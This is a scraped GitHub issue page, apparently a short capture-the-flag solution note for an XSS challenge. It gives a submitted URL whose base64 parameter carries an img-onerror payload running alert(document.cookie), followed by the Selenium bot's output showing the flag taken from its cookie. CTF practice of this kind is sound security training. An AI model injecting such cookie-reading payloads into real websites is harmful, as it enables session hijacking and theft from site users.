We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
直接alert(document.cookie)selenium就把flag打出来了。
alert(document.cookie)
Please submit your quiz URL: > http://202.38.93.111:10056/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg== Your URL converted to http://web/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg== I am using Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.119 Safari/537.36 - Logining... Putting secret flag... - Now browsing your quiz result... ERROR <class 'selenium.common.exceptions.UnexpectedAlertPresentException'> selenium.common.exceptions.UnexpectedAlertPresentException: Alert Text: flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e} Message: unexpected alert open: {Alert text : flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e}} (Session info: headless chrome=106.0.5249.119) Stacktrace: #0 0x55be02e75d53 <unknown> #1 0x55be02c62786 <unknown> #2 0x55be02cd6636 <unknown>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
直接
alert(document.cookie)
selenium就把flag打出来了。The text was updated successfully, but these errors were encountered: